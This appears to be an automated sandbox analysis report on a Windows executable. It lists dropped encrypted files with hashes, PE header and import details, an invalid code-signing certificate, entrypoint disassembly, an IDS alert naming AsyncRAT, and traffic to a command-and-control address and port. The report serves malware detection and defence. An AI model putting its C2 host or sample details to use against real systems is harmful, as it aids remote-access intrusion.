                                                                                              Preview:..n..l.+..i$..j.x/..{w=.dt......1b.c..U..r...v.:..8F`I..,......RB..T8&.....?..3.F.L.....~..uQ.v.....$...hsP..L...2[~b.....H..e..N.O.r.DJF.A.....,.n....8.}:...9EE....xh.V..2.s..."LJ...}%...`..g.8(_..Z...D.}B...Z.~t1........._.....J.2.p~.......mW...J.:..;.._.8...h#rS/Z=.g....at3..A.&t....W..q...%c:.9..L;...?x..s....g...&;-...q..M>.."N...|.?.?H.o..c..7......."..{...S.z...b.t.......)1..=.Z.\..s.e`.]g|..2.....U..&/.....2...G..6./.6.d...5p.......(=.7{...S...P....|..U..8N...q.z.o.M.~r7....h0...8W..B......._..1..P...oQ...L%.@..W.2;7y.....t.B9..w..#/......\.c.V#....*LE.6.=..s....~2E..."...v.x(..._...gR$H.........yv..-.x.J.r....?..4.r.7....#`.^q.$.60......U.s..:.Rv%4Y.........Bw..../k._D.AH.q../0wS].....yb..%..3.. ..4.At.lO... .._......<X.qOYo1......D.Q9..OJ.T...j..$N...._....2.a.?%"....u...7....F.y..b..e.#..RT....D....;|T...`.....p...b".$T.......)yH7L~...r..._...I.)>...P..Joc..Q.E..}L.#..d..e...|.......Xx...............xF....U"]*$%a..C....}.(...C..+...P./?..
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):103424
                                                                                              Entropy (8bit):6.720348410536754
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:4lHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQi:MHS3zcNPj0nEo3tb2K
                                                                                              MD5:BC8482E837081257787168ED9F991FF6
                                                                                              SHA1:379553FDCFE6AB6B601A2A66BCC7C177FE8F8187
                                                                                              SHA-256:855B2ADDDC345F5AD9AAAA2FB387FB3BC2FB61A427589DC1748AAC6F2ABD81A6
                                                                                              SHA-512:3659937156CF8330AC20D73F9CEDF1D3FAA0623319F981E90CE9B386DFC0412307F9EEE6DAAD5C4D892A5AF28173E4DDCB225FFB8E58C07B44947296AD2C728D
                                                                                              Malicious:false
                                                                                              Preview:...t.....N.....~Z.../......VV.....S.."....~..t.....N.....TZ.................9W.\...........1.q.V._....M.......PQ........P......P.=.........p..$.........p....8.}.....~......E.u...Y.....U...M.....|....E..C........s..h.........V....S..C......O...H...wa.$.|zE..F......P....t..J.j..U...1...m................R..a....................@......>.t.............Q.}u...C.........Q.ku...F.....................$..zE..........P..p.I.j..6.......E.........H...K..j..k...E............pq..j..S...p........j..6.C..........Q.p....w.........m.....j....b......E.....U......K..j..u..,.......<....O..q...t.Q..K...w..G.......7.R....F....t....t.....L......X...W.......S..)..S..J....~......E.u...W.....S...M.+...%....{..}..C......3........+..V....S..C..........H...wa.$..zE..F......N....t..J.j..U.../...m............R.._................@.....>.t...........Q.s...C..............E..F........N.....s....3.RP.W......V..F.........C....t....t....AK......V...t......R...v..6RP........V.
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):75776
                                                                                              Entropy (8bit):7.997696574637183
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:tRiKLSpuGzSIxS7PRUh+uvXm2mOLRxsXy2Rf9f8TJjbyODA+W:uKLS0GvxSdUhVvW2mOdx+F9f0ZWODAT
                                                                                              MD5:3B37E91F35A6AEEFC6B5A91D8101153A
                                                                                              SHA1:B841BD260AF6BD4D2BAEBB00413CBBB6178EB1CD
                                                                                              SHA-256:7087BD749974238776890AA74DA73189A92D40CB1A2F9D84CDF6301AA4395F75
                                                                                              SHA-512:4761957076C4FBBADB183BEE69645F65CDDFDA8DCD29B8EF24CCBCEC8B2BBA09E58FB36E7F0056A75F640ED3C9463172F03B2315A492504755D48C5CB39A66C1
                                                                                              Malicious:true
                                                                                              Preview:}Z.*..-..IR(.h.._e.a.iZ.j.....WV.......F..Y.+.*V.N.....+}4:o...1....%.x.......>..P.zE.....j'..'#Z..1...i..M*.........#7.z...=._..j.....{..(......Y..pm6..9..+.X.Q....#.;...#........i...#i............v.4.1...E..}....e.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rq...F.O.'.F...h..............K..7....K..7...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.!..,P..Myn.2..t.W.....*...n..IB.K......K..7...m.....I.....5...x..2).U.j....2>..#.~.\.HE......i_.H...U>D.s.,t..?.....=.a....:'...&F,]._..dWx-.d...[f..&g..!....B ....e..6..r8}*7..2s.7~s...>~.YH.m....x)e9.L..D'q...`.I.X.@9..n..C..52nB..wt..^*@.Z....'.8..Q.r9...M.+7.....{uY..Pf........3..XI-Xop..,t..=.EW..D.o1S..T*......3....n.e.Q
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):63488
                                                                                              Entropy (8bit):7.997285735950619
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:NxOKftW/Z+yOHSqq1SS+aa8KRrHf2ypbVBe:zLlyZcHaa8KRLhre
                                                                                              MD5:8270F3C744085A7C901BF7E295B3F338
                                                                                              SHA1:30C4BA9E939716E202C67BB10D90199FD18478C1
                                                                                              SHA-256:26886D88750967DE149EB94EB46AD7328E4DC107F4693CB4D335E6EDC4906A82
                                                                                              SHA-512:3FCF42B51B7D19E1629CB94225B8B186302ACED4D8286BD5ED298A67FFF1692874CABB776F94EF9049D58411A93D0B8B8766B3841B0094737530427808FC0B16
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):49715
                                                                                              Entropy (8bit):7.996419498927052
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:9PslbzQHaOTlQq0KAcs0CtSEfvrp6Opa3H1ToU16y7fwyveGXM:VubzQlTOJl5tfvgOAGU1t7ffXM
                                                                                              MD5:F883FDA054EC2C66C3B46BEA6F087420
                                                                                              SHA1:B202D846CA77FFAEF48F8195D8B133DA66CDF00D
                                                                                              SHA-256:591D783B7DE462751300D2834C5DC02E9191FA48C947A857E185EB2BC8436AE8
                                                                                              SHA-512:5EC41E0BE4FA15B3E1C136EE13C9671BAEAC7B6D9F8B85B77C9EC194661D720F375F4A1A3718425282D53D1B7E4112154ED37094465D0240569E2D5DD5CA05C0
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):74752
                                                                                              Entropy (8bit):7.997530948349727
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:RG2olUqJG+pRgsnJQ5gx/fIOqzZA98Y6x741/KJJC8Y5UN:EJlHTRgSJr/tqdS474pKJA8YKN
                                                                                              MD5:C50D303E3A009095EA7AA55C330A83C8
                                                                                              SHA1:8FCF589692920B8EE7197F15BE274FABD01B4E4C
                                                                                              SHA-256:33DB9130E999A343CB5E95742C0A01EEF2BC1416A7F1BD8BF2DBA528EA6372C9
                                                                                              SHA-512:8725D66C2C4BA23BD894D60EA7E90F9875D65DEF0BEFEC5E13835471294664EDFAC8D3BDC7979902299CF618D218EECF89CC85664CCEEADBF46B99F6EC2BDAD3
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):67584
                                                                                              Entropy (8bit):7.997117637203714
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:+09pRn+FIcaHsx6I3CbzlB6VW1AZG/0QXbDAKKI:+092iVHsEIy64WZonbDQI
                                                                                              MD5:662EB5D37E0BF1C37B053F2D6FEDE6A8
                                                                                              SHA1:D153CDC036BA55B1E17EF32DE253B10D4B556D82
                                                                                              SHA-256:4C8CC6AAD4EB27CD597D8B594F6D8D174A22C56A476CB0CB8F97A0FD631F97F7
                                                                                              SHA-512:EBC20098BFBCC876AD5E93F6D5FB784379D2571476C5E57CA8FF1AC374CE4E31B5708C814CDF07C6D1B411B2B38AB2653745D3F6967229881ED443B315FB2A2A
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):104448
                                                                                              Entropy (8bit):6.281275211983412
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:6de6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBN/:6d314V14ZgP0JaAOz04pF
                                                                                              MD5:7783FE6744EBFB52F58A026474DE5AA5
                                                                                              SHA1:ABD31C20C25610A87FAECCD629D08855E27F129F
                                                                                              SHA-256:C7FDB060C5F612A8EE6BA330D9D79BD1D48BB5527F1BDD3C8D27D9E110F929B9
                                                                                              SHA-512:763ED920D34AEBC643FC859D2BBD9539437FBE7787D8F1F4C321DC849019B119418EE096DC9E3EB5AE122C4D24CBD434C02450D26A349D2C35B82CC14A24850A
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):70656
                                                                                              Entropy (8bit):7.997548540982771
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:rqtbA/dSLb3376ysrqYVA+AEsVNUz+sFHPviWcbZKWEnpX:rqtbQM/33+ysjjiy+Cc1K9npX
                                                                                              MD5:2D0F361D7B97C89A88521FDEBFBA779A
                                                                                              SHA1:1DC0B184964CEFE04C9B6BF9733398067905F925
                                                                                              SHA-256:5AD087E5E6AB39496651BBCC805817B7CA9837B32F2DCF52A014EF49B1B2DFD8
                                                                                              SHA-512:29AFFD751428D93AFF25F73638CA756AC3E8D3949F0E69352A67E6461F1C079FE0525E4D1B1B298DF0688E6C8A5D222214E4CE30250003FAF6DAAD7FE279C8FE
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):70656
                                                                                              Entropy (8bit):6.5303758356556845
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:P1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzY:PZg5PXPeiR6MKkjGWoUlJUU
                                                                                              MD5:649755AC231CA4ACA6EBF0EB1DC6704D
                                                                                              SHA1:8ABDFAF8AD207CE5927E120C703B64366FACB073
                                                                                              SHA-256:B86D8F9374D7DB5B6E03C699DC7602691EE7F89A94F8207EC4F2E3DE21C5DD48
                                                                                              SHA-512:14FD8E7C55E4A1F9360B7E5B5EA1A359CBB2331C8FCD43F75A3BA10AFE6E29B37B947ADD7E971ECBE168C7EA5DE7C076E171CF6B63984D27652C2DC001F994A5
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):59392
                                                                                              Entropy (8bit):7.99721220612682
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:B+xF/x/a55jhuEkiiMFEZ+ZySaZRAOZhiS4ZUQ43n1CiZjpISCuqYAo2p5h7O+rq:UxcsprMlZy5juSOUQ43giZvcr1h2
                                                                                              MD5:776749EED30AACF122F461EB5AE9204F
                                                                                              SHA1:DB8D8888B261F52438EBB0C1581C58F999D3F409
                                                                                              SHA-256:EB04AEB14F3A4A9DE2CE66560615DF41304FF8A053C74CA0E538C47496F38D3D
                                                                                              SHA-512:561C2E13A4F3F2545F708850914333CE2FFD8C3A9C5973EE213AFD92FE1C1A5FFC13A9A1FE8659B3BB775F387BA8729DB8F16703C810192C1C95974B5F52340D
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):92160
                                                                                              Entropy (8bit):7.997925997775209
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:amp0TOPUD2I761v/D74u1sAvbrUfkVlR+ww46yPPHBxefA/OMp2tr54g1iOd9T1T:JfP1z4uOAvfUfkfRBw4b3H7eoNRQ/T1/
                                                                                              MD5:F3AE69B02EE850DA91795384A7BFCF49
                                                                                              SHA1:C6FD817AC31F8C31C38164DCE6ED985B0F1CA454
                                                                                              SHA-256:7862D5611B20DB9BD5A5DE4475DB98E4FF85745E11CE55BC8918F8897317D1AE
                                                                                              SHA-512:BDCDE65EAA7DC31E860AB72F53AD1CA6A48ECCD1F5E463A5EC270B251E377E034CB1A2F6781BD6EAB291A371C859197FB30D5693939DF307DD34457F6847E3E0
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):89088
                                                                                              Entropy (8bit):7.998229825733063
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:1rQ5wNTOY5aBR/zrwbr//qTX8BFQXYwWJhr+ynJpJEqfub8/pRi3YBERRFO:1rRN/AzILBKXxwr+yJEqfSwi3YB+RFO
                                                                                              MD5:30770A0333EBFBC789BAE3EA0953D0FF
                                                                                              SHA1:540418B2911B911D8F79FE32C85B755D77D446D7
                                                                                              SHA-256:F8D9985873C401AAF10909F66F4EF621D6EA0C39E6EB2E530B4CE16723E33515
                                                                                              SHA-512:7D4B53D5A40F135F8517952667AB854DC4E0D3C67C0ED625DB541210107D1AE03E45A814F0683C93D1396D8B7E8873C4A38301A7E6BBBA14E24D17DA9D4E549F
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):94208
                                                                                              Entropy (8bit):7.997991894566745
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:o8PS8wKEb21O0ufjroLxT5KRmmxhyy1BhhFogEGpIuCox/haDoT4N:o8Pa2inITKRmmxH15Cw/haDou
                                                                                              MD5:D528156A028A88F30E8423EC166C5E1F
                                                                                              SHA1:46E05DE2D13B7305250724FC37A62130188DF41D
                                                                                              SHA-256:EB2AC641C1FA9FE908F110292A1593D7926AD8E97662F7CD0D09EA19D05516F1
                                                                                              SHA-512:84FD60C7B6BFABC979C18F3D4E67DEB0237C947FA032C662539946ABB334F790F1B7FD0EEC6A1F136AA69532BB8FF6B12A7FCDF0B1AF0A9F410326818D2DEA20
                                                                                              Malicious:true
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.995927308335554
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: OR8Ti8rf8h.exe
File size: 3'391'331 bytes
MD5: 6681713c421e1b4951d5a08c39f43e97
SHA1: 23c09997b6cac46683950dbbefa18d65b3250d12
SHA256: af9cd831104a7d0a352cd88f77a4cfbdde43804b5225002fc7115685d2c6297f
SHA512: fec9ed7257466d44055aefbe378f40a9f5066a83b82efe4fbd4bcb9cb3dc447732e7e523d3e47893db35538f80ba358d70d1529da1c16316b709aca10f3d2f10
SSDEEP: 98304:Z/4qyVBXdPfPtPuIao7/+GsQCx9w4zpkcYy:5TyVRvmNQVqPw41kcYy
TLSH: E3F53385DE6F0560DCAA163557B0E6F79BA87E75B4F6C81BFB680C88FC02B53001895B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...D...B...8.....
Icon Hash: faf8fcb8dae2619d
Entrypoint: 0x4038af
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: be41bf7b8cc010b614bd36bbca606973
Signature Valid: false
Signature Issuer: CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After
• 04/01/2022 19:00:00, 04/01/2025 18:59:59
Subject Chain
• CN=SOFTLAND SRL, O=SOFTLAND SRL, S=Cluj, C=RO, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=RO, SERIALNUMBER=J12 /1244 /1999
Version: 3
Thumbprint MD5: 9D25F2B10785AEEE8FBC7D491B79A6B0
Thumbprint SHA-1: FE2887ED7C7BCF13BCDDE7B55B83B5C96DC8738B
Thumbprint SHA-256: 4FE58F27A3C4EA858D3EACBF3DE2E6C44F40F0650D8163C938DAC6865D979262
Serial: 00A7AB1CBE1100EAF792D7F8E8BD6D365E
Instruction (entrypoint disassembly)
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007F0880E3976Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007F0880E3944Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007F0880E3943Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007F0880E36D3Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007F0880E39111h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F0880E36DC3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F0880E36D3Ah
add esi, 02h
cmp word ptr [esi], bx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0xd326 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x33904b | 0x2f18 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0xd326 | 0xd400 | 2872b4606189d0dfc05c5a3c50c6c98b | False | 0.8658055719339622 | data | 7.473909168801405 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10e000 | 0xfd6 | 0x1000 | b402b3676bd396508c38754d9cce3fbc | False | 0.598876953125 | data | 5.586604019934863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100250 | 0x6ade | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.00003655237956
RT_ICON | 0x106d30 | 0x245f | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0011813983460423
RT_ICON | 0x109190 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.5751627339300244
RT_ICON | 0x10b7f8 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.6329690346083788
RT_ICON | 0x10c920 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7774822695035462
RT_DIALOG | 0x10cd88 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x10ce88 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x10cfa4 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x10d004 | 0x4c | data | English | United States | 0.8026315789473685
RT_MANIFEST | 0x10d050 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
Imports
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
IDS alerts
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-12T12:39:15.665492+0100 | 2842478 | ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) | 1 | 208.115.220.58 | 4449 | 192.168.2.7 | 49843 | TCP
TCP packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 12:39:14.182585001 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:14.302377939 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:14.305768967 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:14.314723969 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:14.434544086 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:15.538697004 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:15.545587063 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:15.665492058 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:15.934345007 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:15.988464117 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:19.136265039 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:19.256191969 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:19.257369995 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:19.377209902 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:29.427133083 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:29.546922922 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:29.546998024 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:29.666707993 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:29.935029030 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:29.988523006 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:30.126957893 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:30.134375095 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:30.254499912 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:30.254650116 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:30.374413967 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:39.724359035 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
Dec 12, 2024 12:39:39.844106913 CET | 4449 | 49843 | 208.115.220.58 | 192.168.2.7
Dec 12, 2024 12:39:39.844225883 CET | 49843 | 4449 | 192.168.2.7 | 208.115.220.58
